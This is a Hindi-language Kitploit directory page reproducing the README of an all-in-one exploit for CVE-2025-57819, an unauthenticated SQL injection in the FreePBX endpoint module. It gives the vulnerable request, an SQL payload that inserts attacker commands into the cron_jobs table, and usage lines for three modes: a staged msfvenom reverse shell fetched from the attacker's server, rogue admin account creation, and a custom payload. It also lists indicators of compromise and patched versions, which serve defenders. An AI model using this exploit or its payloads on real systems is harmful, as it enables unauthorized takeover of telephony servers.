Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57819-exploit — FreePBX बिना प्रमाणीकरण के SQLi से RCE तक (CVE-2025-57819) — एकीकृत एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/jeanback1/cve-2025-57819-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubjeanback1/cve-2025-57819-exploit

CVE-2025-57819-exploit

FreePBX बिना प्रमाणीकरण के SQLi से RCE तक (CVE-2025-57819) — एकीकृत एक्सप्लॉइट

रिपॉजिटरी देखें
213 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57819 — FreePBX प्री-ऑथ SQLi से RCE

CVE-2025-57819 के लिए एक ऑल-इन-वन एक्सप्लॉइट, FreePBX के एंडपॉइंट मॉड्यूल में एक अप्रमाणित SQL इंजेक्शन जो क्रॉन जॉब इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन की ओर ले जाता है।

  • CVSS: 9.8 (गंभीर) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CISA KEV: जोड़ा गया 29 अगस्त, 2025
  • प्रभावित: Sangoma FreePBX 15, 16, 17 एंडपॉइंट मॉड्यूल < 15.0.66 / < 16.0.89 / < 17.0.3 के साथ
  • पैच किया गया: एंडपॉइंट 15.0.66, 16.0.89, 17.0.3 में

भेद्यता सारांश

FreePBX admin/ajax.php?module=FreePBX\modules\endpoint\ajax एंडपॉइंट को प्रमाणीकरण की आवश्यकता के बिना उजागर करता है (CWE-288)। brand पैरामीटर को बिना सैनिटाइज़ेशन के सीधे SQL क्वेरी में डाला जाता है (CWE-89), जिससे हमलावर asterisk डेटाबेस में मनमाने SQL स्टेटमेंट इंजेक्ट कर सकता है।

आक्रमण श्रृंखला

root@kitploit:~
[अप्रमाणित HTTP अनुरोध]
        │
        ▼
admin/ajax.php?module=FreePBX\...\ajax&command=model&brand=<SQLi>
        │
        ▼
`cron_jobs` तालिका में SQL इंजेक्शन
(हमलावर-नियंत्रित कमांड के साथ INSERT, अनुसूची="* * * * *")
        │
        ▼
लगभग 60 सेकंड के भीतर, क्रॉन डेमॉन `asterisk` उपयोगकर्ता के रूप में कमांड निष्पादित करता है
        │
        ▼
दूरस्थ कोड निष्पादन

एक्सप्लॉइट क्षमताएँ

यह एक्सप्लॉइट तीन मोड का समर्थन करता है:

1. स्टेज्ड रिवर्स शेल (डिफ़ॉल्ट)

  1. msfvenom के माध्यम से एक linux/x64/shell_reverse_tcp बाइनरी उत्पन्न करता है
  2. बाइनरी प्रदान करने के लिए एक HTTP सर्वर प्रारंभ करता है
  3. शेल के लिए एक TCP श्रोता प्रारंभ करता है
  4. SQLi के माध्यम से एक क्रॉन जॉब इंजेक्ट करता है जो बाइनरी को डाउनलोड + निष्पादित करता है
  5. जब क्रॉन चलता है, तो आपको एक इंटरैक्टिव शेल मिलता है
  6. बाहर निकलने पर इंजेक्ट की गई क्रॉन जॉब को साफ करता है
root@kitploit:~
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>

उदाहरण:

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452

यह रिवर्स शेल के लिए पोर्ट 4452 और HTTP स्टेज सर्वर के लिए 4453 का उपयोग करता है।

2. व्यवस्थापक उपयोगकर्ता निर्माण (--create-user)

SQLi के माध्यम से एक नया FreePBX व्यवस्थापक खाता बनाता है। कोई रिवर्स शेल नहीं, कोई रीचबैक नहीं, किसी बाइनरी की आवश्यकता नहीं।

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user

3. कस्टम पेलोड (--payload <path>)

msfvenom के साथ उत्पन्न करने के बजाय अपना स्वयं का ELF बाइनरी का उपयोग करें।

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /path/to/custom_shell.elf

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)
  • स्टेज्ड मोड के लिए: Metasploit (msfvenom) या --payload के साथ एक कस्टम पेलोड
  • --create-user मोड के लिए: Python + requests के अलावा कुछ नहीं

यह कैसे काम करता है

SQL इंजेक्शन वेक्टर

असुरक्षित एंडपॉइंट है:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=<SQLi>

brand पैरामीटर को बिना सैनिटाइज़ेशन के SQL INSERT में जोड़ा जाता है। एक्सप्लॉइट इंजेक्शन को इस प्रकार तैयार करता है:

root@kitploit:~
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<CMD>',NULL,'* * * * *',30,1,1) --

अंत में -- मूल क्वेरी के शेष भाग को टिप्पणी के रूप में निष्क्रिय कर देता है।

क्रॉन निष्पादन

FreePBX Asterisk क्रॉन सबसिस्टम का उपयोग करता है। क्रॉन जॉब्स हर मिनट जाँची जाती हैं। जब डाली गई जॉब का शेड्यूल (* * * * *) मेल खाता है, तो कमांड asterisk सिस्टम उपयोगकर्ता के रूप में चलती है।

सफाई

सत्र समाप्त होने (या टाइमआउट) के बाद, एक्सप्लॉइट इंजेक्ट की गई क्रॉन जॉब को cron_jobs से हटाने के लिए DELETE SQLi भेजता है।

समझौता संकेतक

  • asterisk.cron_jobs में यादृच्छिक मॉड्यूल/जॉब नामों के साथ अनपेक्षित प्रविष्टियाँ
  • FreePBX सर्वर से उच्च पोर्ट पर बाहरी IP पतों के लिए आउटबाउंड HTTP अनुरोध
  • asterisk उपयोगकर्ता से रिवर्स शेल कनेक्शन
  • ampusers में यादृच्छिक नए व्यवस्थापक खाते (यदि --create-user मोड)

शमन

एंडपॉइंट मॉड्यूल को पैच किए गए संस्करणों में अपडेट करें:

  • 15: >= 15.0.66
  • 16: >= 16.0.89
  • 17: >= 17.0.3

संदर्भ

  • NVD — CVE-2025-57819
  • GitHub Security Advisory — GHSA-m42g-xg4c-5f3h
  • CISA ज्ञात शोषित भेद्यताएँ
  • watchTowr Labs
  • FreePBX सामुदायिक सलाह

अस्वीकरण

यह सॉफ्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें